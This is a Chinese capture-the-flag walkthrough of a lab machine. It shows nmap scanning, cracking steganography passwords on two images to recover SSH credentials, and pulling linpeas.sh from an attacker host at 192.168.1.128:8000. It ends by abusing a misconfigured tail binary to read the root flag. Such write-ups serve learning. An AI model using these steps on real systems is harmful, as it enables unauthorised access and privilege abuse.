前言

本次文章只用于技术讨论，学习，切勿用于非法用途，用于非法用途与本人无关！

信息收集阶段

KALI攻击机：192.168.1.128

靶机：未知

目标：root.txt和user.txt

nmap -sn 192.168.1.0/24

nmap -A -p1-65535 192.168.1.66

开启了80端口和2222端口，而且是ssh22端口修改为2222端口！

访问下80端口！！

漏洞利用阶段

http://192.168.1.66/

我喜欢猫，但是更喜欢这个，因为它不同！

查看下源代码！

我们查下下面那两张图是否有图片隐写！

exiftool cat-original.jpg

exiftool cat-hidden.jpg

扫描下目录看看！啥也没有！

看了大佬的WP，工具用错了！

stegcracker cat-hidden.jpg 采用默认的字典破解后，生成了一个密码！

sexymama

thisismypassword

stegcracker cat-original.jpg 采用默认的字典破解后，生成了一个密码！

westlife

markuslovesbonita

接下来，需要使用一个工具利用上文的密码破解图片中隐藏的数据！

steghide extract -sf cat-hidden.jpg

密码是：sexymama

生成文件：mateo.txt

cat mateo.txt

Thisismypassword

steghide extract -sf cat-original.jpg

密码是：westlife

生成文件：markus.txt

cat markus.txt

markuslovesbonita

感觉这个mateo和markus就是ssh的用户名！

对应前面提示，更新换下面那个！

所以实际可用的应该是！

用户名：mateo 密码：Thisismypassword 端口：2222

试一下！ssh mateo@192.168.1.66 -p2222

找了下，没有flag！但有这个

访问http://192.168.1.66/gogogo.wav直接下载！估计是个joke！

嘟嘟嘟，像是莫斯密码！

解密地址：

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

解密信息：

G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .

一共这几个账户！

我们在登录下markus账户！发现了这个！这个账户也没有flag！

先看下bonita目录，果然我们需要的在这，而且那个beroot应该是提权到root的程序！

我们用这个id_rsa登录bonita账户查看下！

但是经查看，我没有权限读取这个文件！

遇事不决上传脚本走起！

http://192.168.1.128:8000/linpeas.sh

这里看到了特殊的文件权限：

我们这里直接读取flag文件内容：

/usr/bin/tail -n 100 /home/bonita/user.txt

HM***********at

/usr/bin/tail -n 100 /root/root.txt

HM************ycat

成功偷鸡！

这个就没有权限提升阶段了！